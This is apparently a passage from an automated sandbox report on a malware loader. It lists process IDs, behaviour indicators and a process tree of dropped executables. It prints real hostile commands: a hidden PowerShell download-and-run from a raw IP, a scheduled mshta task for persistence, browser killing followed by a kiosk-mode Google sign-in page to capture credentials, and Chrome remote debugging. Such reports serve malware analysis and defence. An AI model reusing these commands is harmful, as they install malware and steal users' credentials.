pid Process 2368 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 1664 chrome.exe 2516 amnew.exe 1956 72426d1546.exe 1956 72426d1546.exe 1956 72426d1546.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 2360 dcc3187c3d.exe 2360 dcc3187c3d.exe 2360 dcc3187c3d.exe 1780 19338d89d6.exe 2436 firefox.exe 2436 firefox.exe 2436 firefox.exe 2436 firefox.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3112 firefox.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 1956 72426d1546.exe 1956 72426d1546.exe 1956 72426d1546.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 2360 dcc3187c3d.exe 2360 dcc3187c3d.exe 2360 dcc3187c3d.exe 1780 19338d89d6.exe 2436 firefox.exe 2436 firefox.exe 2436 firefox.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 1780 19338d89d6.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3112 firefox.exe 3112 firefox.exe 3112 firefox.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe 3360 a9c940aa2d.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2232 C3hYpvm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2368 wrote to memory of 1976 2368 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 30 PID 2368 wrote to memory of 1976 2368 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 30 PID 2368 wrote to memory of 1976 2368 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 30 PID 2368 wrote to memory of 1976 2368 efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe 30 PID 1976 wrote to memory of 2912 1976 skotes.exe 32 PID 1976 wrote to memory of 2912 1976 skotes.exe 32 PID 1976 wrote to memory of 2912 1976 skotes.exe 32 PID 1976 wrote to memory of 2912 1976 skotes.exe 32 PID 2912 wrote to memory of 2804 2912 Ta3ZyUR.exe 33 PID 2912 wrote to memory of 2804 2912 Ta3ZyUR.exe 33 PID 2912 wrote to memory of 2804 2912 Ta3ZyUR.exe 33 PID 2912 wrote to memory of 2804 2912 Ta3ZyUR.exe 33 PID 2912 wrote to memory of 2804 2912 Ta3ZyUR.exe 33 PID 2912 wrote to memory of 2804 2912 Ta3ZyUR.exe 33 PID 2912 wrote to memory of 2804 2912 Ta3ZyUR.exe 33 PID 2912 wrote to memory of 2804 2912 Ta3ZyUR.exe 33 PID 2912 wrote to memory of 2804 2912 Ta3ZyUR.exe 33 PID 2912 wrote to memory of 2804 2912 Ta3ZyUR.exe 33 PID 2912 wrote to memory of 2940 2912 Ta3ZyUR.exe 34 PID 2912 wrote to memory of 2940 2912 Ta3ZyUR.exe 34 PID 2912 wrote to memory of 2940 2912 Ta3ZyUR.exe 34 PID 2912 wrote to memory of 2940 2912 Ta3ZyUR.exe 34 PID 1976 wrote to memory of 1076 1976 skotes.exe 36 PID 1976 wrote to memory of 1076 1976 skotes.exe 36 PID 1976 wrote to memory of 1076 1976 skotes.exe 36 PID 1976 wrote to memory of 1076 1976 skotes.exe 36 PID 1076 wrote to memory of 2572 1076 qFqSpAp.exe 37 PID 1076 wrote to memory of 2572 1076 qFqSpAp.exe 37 PID 1076 wrote to memory of 2572 1076 qFqSpAp.exe 37 PID 1076 wrote to memory of 2572 1076 qFqSpAp.exe 37 PID 1976 wrote to memory of 1876 1976 skotes.exe 38 PID 1976 wrote to memory of 1876 1976 skotes.exe 38 PID 1976 wrote to memory of 1876 1976 skotes.exe 38 PID 1976 wrote to memory of 1876 1976 skotes.exe 38 PID 1976 wrote to memory of 1572 1976 skotes.exe 39 PID 1976 wrote to memory of 1572 1976 skotes.exe 39 PID 1976 wrote to memory of 1572 1976 skotes.exe 39 PID 1976 wrote to memory of 1572 1976 skotes.exe 39 PID 1572 wrote to memory of 2044 1572 7aencsM.exe 40 PID 1572 wrote to memory of 2044 1572 7aencsM.exe 40 PID 1572 wrote to memory of 2044 1572 7aencsM.exe 40 PID 1572 wrote to memory of 2044 1572 7aencsM.exe 40 PID 1572 wrote to memory of 2044 1572 7aencsM.exe 40 PID 1572 wrote to memory of 2044 1572 7aencsM.exe 40 PID 1572 wrote to memory of 2044 1572 7aencsM.exe 40 PID 1572 wrote to memory of 2044 1572 7aencsM.exe 40 PID 1572 wrote to memory of 2044 1572 7aencsM.exe 40 PID 1572 wrote to memory of 2044 1572 7aencsM.exe 40 PID 1572 wrote to memory of 2044 1572 7aencsM.exe 40 PID 1572 wrote to memory of 2044 1572 7aencsM.exe 40 PID 1572 wrote to memory of 2800 1572 7aencsM.exe 41 PID 1572 wrote to memory of 2800 1572 7aencsM.exe 41 PID 1572 wrote to memory of 2800 1572 7aencsM.exe 41 PID 1572 wrote to memory of 2800 1572 7aencsM.exe 41 PID 1976 wrote to memory of 2232 1976 skotes.exe 43 PID 1976 wrote to memory of 2232 1976 skotes.exe 43 PID 1976 wrote to memory of 2232 1976 skotes.exe 43 PID 1976 wrote to memory of 2232 1976 skotes.exe 43 PID 1876 wrote to memory of 1652 1876 m5UP2Yj.exe 44 PID 1876 wrote to memory of 1652 1876 m5UP2Yj.exe 44 PID 1876 wrote to memory of 1652 1876 m5UP2Yj.exe 44 PID 1876 wrote to memory of 1652 1876 m5UP2Yj.exe 44 PID 2044 wrote to memory of 1664 2044 7aencsM.exe 45 PID 2044 wrote to memory of 1664 2044 7aencsM.exe 45 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe"C:\Users\Admin\AppData\Local\Temp\efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2804
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 5564⤵
- Loads dropped DLL
- Program crash
PID:2940
-
-
-
C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 2404⤵
- Loads dropped DLL
- Program crash
PID:2572
-
-
-
C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1876 -s 8004⤵
- Loads dropped DLL
- Program crash
PID:1652
-
-
-
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1664 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2b29758,0x7fef2b29768,0x7fef2b297786⤵PID:2488
-
-
C:\Windows\system32\ctfmon.exectfmon.exe6⤵PID:2384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1152 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:26⤵PID:2220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:86⤵PID:1300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1632 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:86⤵PID:1984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2340 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2356 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:2932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1180 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:26⤵PID:1180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2520 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:26⤵PID:2340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=1456 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:16⤵
- Uses browser remote debugging
PID:1188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3500 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:86⤵PID:2516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3612 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:86⤵PID:1064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4056 --field-trial-handle=1236,i,480613158413148589,7864770424881284737,131072 /prefetch:86⤵PID:2580
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ba168" & exit5⤵
- System Location Discovery: System Language Discovery
PID:896 -
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1032
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 5644⤵
- Loads dropped DLL
- Program crash
PID:2800
-
-
-
C:\Users\Admin\AppData\Local\Temp\1085139001\C3hYpvm.exe"C:\Users\Admin\AppData\Local\Temp\1085139001\C3hYpvm.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2232
-
-
C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:2012
-
-
C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocklisted process makes network request
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1016
-
-
C:\Users\Admin\AppData\Local\Temp\1086907001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1086907001\amnew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2516 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1864 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1076 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 5566⤵
- Loads dropped DLL
- Program crash
PID:536
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008220101\a9c940aa2d.exe"C:\Users\Admin\AppData\Local\Temp\10008220101\a9c940aa2d.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3360 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4016
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:3104
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3112 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.0.147233028\812396873" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1192 -prefsLen 21028 -prefMapSize 233548 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b409eb7a-d12b-420b-86ee-871e0919f003} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 1288 141fa558 gpu8⤵PID:3244
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.1.960542121\663901535" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21889 -prefMapSize 233548 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b9bbebc-7d20-46d1-ae82-3441cc196f8f} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 1500 e73658 socket8⤵PID:3376
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.2.29217744\1243186553" -childID 1 -isForBrowser -prefsHandle 2204 -prefMapHandle 2036 -prefsLen 21927 -prefMapSize 233548 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ada0cc16-d7ce-41e2-b0c6-789e3ab860d4} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 2016 1abd1458 tab8⤵PID:3172
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.3.780309323\936159433" -childID 2 -isForBrowser -prefsHandle 2864 -prefMapHandle 2860 -prefsLen 26340 -prefMapSize 233548 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6aaa3384-661b-4022-a4e7-78934d269556} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 2876 1ea10e58 tab8⤵PID:3876
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.4.1931462273\245575443" -childID 3 -isForBrowser -prefsHandle 3832 -prefMapHandle 3816 -prefsLen 26399 -prefMapSize 233548 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0abf98b-b688-4e85-a34e-ccb53dac0141} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 3840 205bf558 tab8⤵PID:3640
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.5.1011211546\1454643586" -childID 4 -isForBrowser -prefsHandle 3960 -prefMapHandle 3964 -prefsLen 26399 -prefMapSize 233548 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {facef2b8-dd38-4602-beda-2721a11c7784} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 3948 20bd3458 tab8⤵PID:3700
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3112.6.265134265\1838742115" -childID 5 -isForBrowser -prefsHandle 4008 -prefMapHandle 4004 -prefsLen 26399 -prefMapSize 233548 -jsInitHandle 664 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c98b6fb1-df9f-44e3-a285-e63b87c9c027} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" 4020 20bd5e58 tab8⤵PID:3776
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008230101\bb6617c10a.exe"C:\Users\Admin\AppData\Local\Temp\10008230101\bb6617c10a.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3840 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- System Location Discovery: System Language Discovery
PID:3920
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086933101\72426d1546.exe"C:\Users\Admin\AppData\Local\Temp\1086933101\72426d1546.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1956 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Tu5CCmaw283 /tr "mshta C:\Users\Admin\AppData\Local\Temp\wvOWNZAct.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:1964 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Tu5CCmaw283 /tr "mshta C:\Users\Admin\AppData\Local\Temp\wvOWNZAct.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2332
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\wvOWNZAct.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808 -
C:\Users\Admin\AppData\Local\TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE"C:\Users\Admin\AppData\Local\TempQBEGAOSVUXZS1SNUIJZ9ZNDOXWT4PTXI.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1086934021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:1016 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1086934021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
PID:1380 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:1960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
